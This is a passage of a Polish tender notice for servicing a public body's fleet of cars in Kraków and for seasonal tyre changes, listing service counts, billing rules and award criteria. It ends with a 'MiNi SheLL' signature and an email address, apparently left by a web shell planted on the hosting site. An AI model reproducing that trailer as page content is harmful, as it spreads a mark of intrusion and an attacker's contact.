12.Maksymalny czas wykonania przeglądu winien wynieść 3 dni robocze i liczony będzie od momentu wydania samochodu wykonawcy.
13.Szacunkowa liczba przeglądów, ustalona przez Zamawiającego w oparciu o planowany przebieg poszczególnych samochodów przedstawia się następująco: 
Samochody Skoda: Octavia Tour - 1 po 120 000 km, 1 po 135 000 km, 1 po 150 000 km, Octavia II - 1 po 75 000 km, 1 po 90 000 km, 1 po 105 000 km, 1 po 120 000 km, 1 po 135 000 km, 1 po 150 000 km,
14.Zamawiający oświadcza, iż podane w pkt 13 liczby przeglądów mają charakter przybliżony, a rzeczywista liczba zleconych przeglądów zależeć będzie od przebiegu poszczególnych samochodów.
15.Zamawiający wymaga, aby przeglądy wykonywane były w granicach administracyjnych Miasta Krakowa, w warunkach warsztatowych, z zachowaniem należytej staranności (oraz przy przestrzeganiu przepisów prawa w szczególności przepisów bezpieczeństwa).

Zamawiający dopuszcza powierzenie wykonywania całości lub części zamówienia podwykonawcom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Rabat na częsci zamienne oryginalne - 20</li>
<li>3. Rabat na części zamienne zamienniki - 10</li>
<li>4. Rabat na materiały eksploatacyjne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa w zakresie przeglądów gwarancyjnych i pogwarancyjnych samochodów - Samochody Suzuki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> samochody marki Suzuki, w tym: SX4 - 3 szt., Jimmy - 19 szt., Grand Vitara - 1 szt.
Zamówienie obejmuje:

1.Wykonywanie przeglądów gwarancyjnych i pogwarancyjnych. Zamawiający wymaga, aby przeglądy te były wykonywane w zakresie i w sposób wymagany przez producenta samochodów, nie powodujący utraty przez Zamawiającego uprawnień wynikających z udzielonej mu przez producenta samochodów gwarancji. W przypadku odmowy przez producenta samochodów wykonania naprawy gwarancyjnej z powodu wadliwego wykonania przeglądu (w szczególności: nie zachowania reżimu technologicznego, nie wykonania wszystkich czynności lub nie zachowania ich kolejności,  wymaganych przez gwaranta, użycia części zamiennych, materiałów lub płynów eksploatacyjnych albo innych elementów wyposażenia, niezgodnych ze specyfikacją producenta samochodów (gwaranta)) wykonawca zobowiązany będzie do naprawienia wynikłej stąd szkody, w szczególności do poniesienia kosztów naprawy, w zakresie w jakim nie została ona wykonana w ramach gwarancji producenta samochodów. Za wystarczającą podstawą do żądania od wykonawcy naprawienia szkody w powyższym zakresie będzie pisemna odmowa producenta samochodów naprawy gwarancyjnej z podaniem uzasadnienia.
2. Dostawę niezbędnych części zamiennych, materiałów i płynów eksploatacyjnych, które zostały dopuszczone przez producenta w uzgodnieniu z Zamawiającym (nowe) po cenach katalogowych
3.Demontaż zużytych części i materiałów wynikających z przeglądów oraz ich utylizacja, z zastrzeżeniem, iż Zamawiający może zażądać wydania mu zdemontowanych części lub innych elementów wyposażenia samochodu.
4.Wymianę płynów eksploatacyjnych, montaż nowych materiałów i części zamiennych wynikający z przeglądów. Zamawiający zastrzega sobie prawo do przekazania Wykonawcy własnych płynów eksploatacyjnych, części zamiennych oraz do zakupu części zamiennych we własnym zakresie.
5.Uzyskiwanie każdorazowo zgody Zamawiającego na zamontowanie części innych niż nowe lub oryginalne, dopuszczone przez producenta samochodu, w szczególności dotyczy to tzw. zamienników  lub części regenerowanych.
6.Na wyżej wymienione usługi Wykonawca, udzieli gwarancji, nie krótszej niż 8 m-cy, którą określi w Formularzu ofertowym. Gwarancja na części zamienne zgodna z terminem gwarancji producenta tychże części.
7.Ceny  roboczogodziny obowiązywać będą w odniesieniu do wszystkich zleceń przyjętych do końca okresu obowiązywania umowy i winny uwzględniać wszystkie narzuty oraz ewentualne rabaty określone w Formularzu ofertowym.
8.Koszty materiałowe rozliczane będą zgodnie z cennikiem zawartym w katalogu ASO dla danej marki (dla części oryginalnych) i katalogu InterCars dla zamienników, udzielonymi rabatami oraz wystawionymi na ich podstawie fakturami VAT. Ilość roboczogodzin będzie liczona przy zastosowaniu katalogu ASO dla danej marki samochodów.
9.Przekazanie przez Zamawiającego pojazdów samochodowych do przeglądu odbywać się będzie każdorazowo na podstawie odrębnego zlecenia w jednej z następujących form wybranych przez Zamawiającego: pisemnie, mailowo, faksem lub telefonicznie.
10.Podstawą do uruchomienia przeglądu przez Wykonawcę jest zaakceptowany kosztorys. W tym celu Wykonawca przyjmując samochód do przeglądu i otwierając zlecenie przedstawi kalkulację przeglądu w postaci kosztorysu. Zamawiający po analizie zatwierdzi kosztorys i odwrotnie, osobiście, mailem lub faksem, przekaże do realizacji. Zamawiający zastrzega konieczność sporządzenia dodatkowego kosztorysu i jego akceptacji wg zasad wyżej wskazanych, w na wypadek rozszerzenia zakresu prac Wykonawcy.
11.Rozliczenie przeglądu odbędzie się każdorazowo na podstawie stawki godzinowej brutto (roboczogodziny) podanej przez wykonawcę w Formularzu ofertowym, przyjmując za podstawę obliczeń normy czasowe wykazane w obowiązujących katalogach ASO. Katalogi norm czasowych będą do wglądu przez Zamawiającego w każdej chwili na żądanie. Rozliczenie części zamiennych będzie dokonywane w oparciu o ceny z aktualnych cenników zawartych w katalogach ASO lub Intercars pomniejszonych o rabaty wymienione w Formularzu ofertowym.
12.Maksymalny czas wykonania przeglądu winien wynieść 3 dni robocze i liczony będzie od momentu wydania samochodu wykonawcy.
13.Szacunkowa liczba przeglądów, ustalona przez Zamawiającego w oparciu o planowany przebieg poszczególnych samochodów przedstawia się następująco: 
Samochody Suzuki: Jimny: 7 po 15 000 km, 15 po 30 000 km, 15 po 45 000 km, 8 po 60 000 km, 3 po 90 000 km, 4 po 105 000 km, 4 po 120 000 km, 1 po 135 000 km, SX4: 1 po 120 000 km, 3 po 135 000 km, 3 po 150 000 km, 3 po 165 000 km, Grand Vitara: 1 po 60 000 km, 75 000 km, 1 po 90 000 km
14.Zamawiający oświadcza, iż podane w pkt 13 liczby przeglądów mają charakter przybliżony, a rzeczywista liczba zleconych przeglądów zależeć będzie od przebiegu poszczególnych samochodów.
15.Zamawiający wymaga, aby przeglądy wykonywane były w granicach administracyjnych Miasta Krakowa, w warunkach warsztatowych, z zachowaniem należytej staranności (oraz przy przestrzeganiu przepisów prawa w szczególności przepisów bezpieczeństwa).

Zamawiający dopuszcza powierzenie wykonywania całości lub części zamówienia podwykonawcom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Rabat na części zamienne oryginalne - 20</li>
<li>3. Rabat na części zamienne zamienniki - 10</li>
<li>4. Rabat na materiały eksploatacyjne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa w zakresie przeglądów gwarancyjnych i pogwarancyjnych samochodów - samochody Dacia Duster.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Samochody marki Dacia, w tym: Duster - 3 szt.
Zamówienie obejmuje:

1.Wykonywanie przeglądów gwarancyjnych i pogwarancyjnych. Zamawiający wymaga, aby przeglądy te były wykonywane w zakresie i w sposób wymagany przez producenta samochodów, nie powodujący utraty przez Zamawiającego uprawnień wynikających z udzielonej mu przez producenta samochodów gwarancji. W przypadku odmowy przez producenta samochodów wykonania naprawy gwarancyjnej z powodu wadliwego wykonania przeglądu (w szczególności: nie zachowania reżimu technologicznego, nie wykonania wszystkich czynności lub nie zachowania ich kolejności,  wymaganych przez gwaranta, użycia części zamiennych, materiałów lub płynów eksploatacyjnych albo innych elementów wyposażenia, niezgodnych ze specyfikacją producenta samochodów (gwaranta)) wykonawca zobowiązany będzie do naprawienia wynikłej stąd szkody, w szczególności do poniesienia kosztów naprawy, w zakresie w jakim nie została ona wykonana w ramach gwarancji producenta samochodów. Za wystarczającą podstawą do żądania od wykonawcy naprawienia szkody w powyższym zakresie będzie pisemna odmowa producenta samochodów naprawy gwarancyjnej z podaniem uzasadnienia.
2. Dostawę niezbędnych części zamiennych, materiałów i płynów eksploatacyjnych, które zostały dopuszczone przez producenta w uzgodnieniu z Zamawiającym (nowe) po cenach katalogowych
3.Demontaż zużytych części i materiałów wynikających z przeglądów oraz ich utylizacja, z zastrzeżeniem, iż Zamawiający może zażądać wydania mu zdemontowanych części lub innych elementów wyposażenia samochodu.
4.Wymianę płynów eksploatacyjnych, montaż nowych materiałów i części zamiennych wynikający z przeglądów. Zamawiający zastrzega sobie prawo do przekazania Wykonawcy własnych płynów eksploatacyjnych, części zamiennych oraz do zakupu części zamiennych we własnym zakresie.
5.Uzyskiwanie każdorazowo zgody Zamawiającego na zamontowanie części innych niż nowe lub oryginalne, dopuszczone przez producenta samochodu, w szczególności dotyczy to tzw. zamienników  lub części regenerowanych.
6.Na wyżej wymienione usługi Wykonawca, udzieli gwarancji, nie krótszej niż 8 m-cy, którą określi w Formularzu ofertowym. Gwarancja na części zamienne zgodna z terminem gwarancji producenta tychże części.
7.Ceny  roboczogodziny obowiązywać będą w odniesieniu do wszystkich zleceń przyjętych do końca okresu obowiązywania umowy i winny uwzględniać wszystkie narzuty oraz ewentualne rabaty określone w Formularzu ofertowym.
8.Koszty materiałowe rozliczane będą zgodnie z cennikiem zawartym w katalogu ASO dla danej marki (dla części oryginalnych) i katalogu InterCars dla zamienników, udzielonymi rabatami oraz wystawionymi na ich podstawie fakturami VAT. Ilość roboczogodzin będzie liczona przy zastosowaniu katalogu ASO dla danej marki samochodów.
9.Przekazanie przez Zamawiającego pojazdów samochodowych do przeglądu odbywać się będzie każdorazowo na podstawie odrębnego zlecenia w jednej z następujących form wybranych przez Zamawiającego: pisemnie, mailowo, faksem lub telefonicznie.
10.Podstawą do uruchomienia przeglądu przez Wykonawcę jest zaakceptowany kosztorys. W tym celu Wykonawca przyjmując samochód do przeglądu i otwierając zlecenie przedstawi kalkulację przeglądu w postaci kosztorysu. Zamawiający po analizie zatwierdzi kosztorys i odwrotnie, osobiście, mailem lub faksem, przekaże do realizacji. Zamawiający zastrzega konieczność sporządzenia dodatkowego kosztorysu i jego akceptacji wg zasad wyżej wskazanych, w na wypadek rozszerzenia zakresu prac Wykonawcy.
11.Rozliczenie przeglądu odbędzie się każdorazowo na podstawie stawki godzinowej brutto (roboczogodziny) podanej przez wykonawcę w Formularzu ofertowym, przyjmując za podstawę obliczeń normy czasowe wykazane w obowiązujących katalogach ASO. Katalogi norm czasowych będą do wglądu przez Zamawiającego w każdej chwili na żądanie. Rozliczenie części zamiennych będzie dokonywane w oparciu o ceny z aktualnych cenników zawartych w katalogach ASO lub Intercars pomniejszonych o rabaty wymienione w Formularzu ofertowym.
12.Maksymalny czas wykonania przeglądu winien wynieść 3 dni robocze i liczony będzie od momentu wydania samochodu wykonawcy.
13.Szacunkowa liczba przeglądów, ustalona przez Zamawiającego w oparciu o planowany przebieg poszczególnych samochodów przedstawia się następująco: c)Samochody Dacia Duster - 3 po 60 000 km, 3 po 80 000 km,
 14.Zamawiający oświadcza, iż podane w pkt 13 liczby przeglądów mają charakter przybliżony, a rzeczywista liczba zleconych przeglądów zależeć będzie od przebiegu poszczególnych samochodów.
15.Zamawiający wymaga, aby przeglądy wykonywane były w granicach administracyjnych Miasta Krakowa, w warunkach warsztatowych, z zachowaniem należytej staranności (oraz przy przestrzeganiu przepisów prawa w szczególności przepisów bezpieczeństwa).

Zamawiający dopuszcza powierzenie wykonywania całości lub części zamówienia podwykonawcom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Rabat na części zamienne oryginalne - 20</li>
<li>3. Rabat na części zamienne zamienniki - 10</li>
<li>4. Rabat na materiały eksploatacyjne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługa w zakresie przeglądów gwarancyjnych i pogwarancyjnych samochodów - Samochody marki Łada i Fiat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Samochody marki samochody marki Łada i Fiat, w tym: Niva - 6 sztuk, Albea - 1 szt.
Zamówienie obejmuje:

1.Wykonywanie przeglądów gwarancyjnych i pogwarancyjnych. Zamawiający wymaga, aby przeglądy te były wykonywane w zakresie i w sposób wymagany przez producenta samochodów, nie powodujący utraty przez Zamawiającego uprawnień wynikających z udzielonej mu przez producenta samochodów gwarancji. W przypadku odmowy przez producenta samochodów wykonania naprawy gwarancyjnej z powodu wadliwego wykonania przeglądu (w szczególności: nie zachowania reżimu technologicznego, nie wykonania wszystkich czynności lub nie zachowania ich kolejności,  wymaganych przez gwaranta, użycia części zamiennych, materiałów lub płynów eksploatacyjnych albo innych elementów wyposażenia, niezgodnych ze specyfikacją producenta samochodów (gwaranta)) wykonawca zobowiązany będzie do naprawienia wynikłej stąd szkody, w szczególności do poniesienia kosztów naprawy, w zakresie w jakim nie została ona wykonana w ramach gwarancji producenta samochodów. Za wystarczającą podstawą do żądania od wykonawcy naprawienia szkody w powyższym zakresie będzie pisemna odmowa producenta samochodów naprawy gwarancyjnej z podaniem uzasadnienia.
2. Dostawę niezbędnych części zamiennych, materiałów i płynów eksploatacyjnych, które zostały dopuszczone przez producenta w uzgodnieniu z Zamawiającym (nowe) po cenach katalogowych
3.Demontaż zużytych części i materiałów wynikających z przeglądów oraz ich utylizacja, z zastrzeżeniem, iż Zamawiający może zażądać wydania mu zdemontowanych części lub innych elementów wyposażenia samochodu.
4.Wymianę płynów eksploatacyjnych, montaż nowych materiałów i części zamiennych wynikający z przeglądów. Zamawiający zastrzega sobie prawo do przekazania Wykonawcy własnych płynów eksploatacyjnych, części zamiennych oraz do zakupu części zamiennych we własnym zakresie.
5.Uzyskiwanie każdorazowo zgody Zamawiającego na zamontowanie części innych niż nowe lub oryginalne, dopuszczone przez producenta samochodu, w szczególności dotyczy to tzw. zamienników  lub części regenerowanych.
6.Na wyżej wymienione usługi Wykonawca, udzieli gwarancji, nie krótszej niż 8 m-cy, którą określi w Formularzu ofertowym. Gwarancja na części zamienne zgodna z terminem gwarancji producenta tychże części.
7.Ceny  roboczogodziny obowiązywać będą w odniesieniu do wszystkich zleceń przyjętych do końca okresu obowiązywania umowy i winny uwzględniać wszystkie narzuty oraz ewentualne rabaty określone w Formularzu ofertowym.
8.Koszty materiałowe rozliczane będą zgodnie z cennikiem zawartym w katalogu ASO dla danej marki (dla części oryginalnych) i katalogu InterCars dla zamienników, udzielonymi rabatami oraz wystawionymi na ich podstawie fakturami VAT. Ilość roboczogodzin będzie liczona przy zastosowaniu katalogu ASO dla danej marki samochodów.
9.Przekazanie przez Zamawiającego pojazdów samochodowych do przeglądu odbywać się będzie każdorazowo na podstawie odrębnego zlecenia w jednej z następujących form wybranych przez Zamawiającego: pisemnie, mailowo, faksem lub telefonicznie.
10.Podstawą do uruchomienia przeglądu przez Wykonawcę jest zaakceptowany kosztorys. W tym celu Wykonawca przyjmując samochód do przeglądu i otwierając zlecenie przedstawi kalkulację przeglądu w postaci kosztorysu. Zamawiający po analizie zatwierdzi kosztorys i odwrotnie, osobiście, mailem lub faksem, przekaże do realizacji. Zamawiający zastrzega konieczność sporządzenia dodatkowego kosztorysu i jego akceptacji wg zasad wyżej wskazanych, w na wypadek rozszerzenia zakresu prac Wykonawcy.
11.Rozliczenie przeglądu odbędzie się każdorazowo na podstawie stawki godzinowej brutto (roboczogodziny) podanej przez wykonawcę w Formularzu ofertowym, przyjmując za podstawę obliczeń normy czasowe wykazane w obowiązujących katalogach ASO. Katalogi norm czasowych będą do wglądu przez Zamawiającego w każdej chwili na żądanie. Rozliczenie części zamiennych będzie dokonywane w oparciu o ceny z aktualnych cenników zawartych w katalogach ASO lub Intercars pomniejszonych o rabaty wymienione w Formularzu ofertowym.
12.Maksymalny czas wykonania przeglądu winien wynieść 3 dni robocze i liczony będzie od momentu wydania samochodu wykonawcy.
13.Szacunkowa liczba przeglądów, ustalona przez Zamawiającego w oparciu o planowany przebieg poszczególnych samochodów przedstawia się następująco:  Samochody marki Łada: Niva 4x4: 6 po 60 000 km, 6 po 70 000 km, 6 po 80 000 km, 6 po 90 000 km, Samochód Fiat: Albea: 1 po 160 000 km
14.Zamawiający oświadcza, iż podane w pkt 13 liczby przeglądów mają charakter przybliżony, a rzeczywista liczba zleconych przeglądów zależeć będzie od przebiegu poszczególnych samochodów.
15.Zamawiający wymaga, aby przeglądy wykonywane były w granicach administracyjnych Miasta Krakowa, w warunkach warsztatowych, z zachowaniem należytej staranności (oraz przy przestrzeganiu przepisów prawa w szczególności przepisów bezpieczeństwa).

Zamawiający dopuszcza powierzenie wykonywania całości lub części zamówienia podwykonawcom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Rabat na części zamienne oryginalne - 20</li>
<li>3. Rabat na części zamienne zamienniki - 10</li>
<li>4. Rabat na materiały eksploatacyjne - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wymiana opon.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólne warunki realizacji zamówienia 
1.Na zlecenie Zamawiającego Wykonawca wykonywać będzie wymianę opon, dwukrotnie w roku, raz na opony zimowe i raz na opony letnie.
2.Usługa, o której mowa w pkt 1 obejmować będzie: demontaż kół z samochodu, ściągnięcie opon z felg, wyczyszczenie felg i opon,  kontrolę rantu felgi i w razie konieczności wykonanie prostowania (tam gdzie jest to możliwe przy użyciu ręcznych narzędzi), każdorazowej wymianie wentyli, wykonanie uszczelnienia przy użyciu właściwych substancji klejących, założenie opon na felgi, pompowanie opon do poziomu ciśnienia wskazywanego przez producenta samochodu, wyważenie opon, montaż opon na samochodzie, z zastrzeżeniem, iż wartość momentu obrotowego przy dokręceniu śrub mocujących powinna być zgodna ze wskazaniami producenta samochodu.
3.Wykonawca wykona usługę wymiany opon  w ciągu 2 dni roboczych od dnia zgłoszenie dokonanego przez Zamawiającego. Zgłoszenie to może zostać dokonane w formie telefonicznej lub mailowej.
4.Zamawiający oświadcza, iż w ramach jednego zgłoszenia liczba samochodów, w których maja zostać wymienione opony nie przekroczy 10 sztuk.
5.Wymiana opon będzie wykonywana w warunkach warsztatowych w granicach administracyjnych Miasta Krakowa.
6.W przypadku wykonania usługi w sposób niezgodny  z wymogami stawianymi przez Zamawiającego, Wykonawca zobowiązany będzie do usunięcia ewentualnych usterek lub wad w ciągu jednego dnia roboczego od dnia ich zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com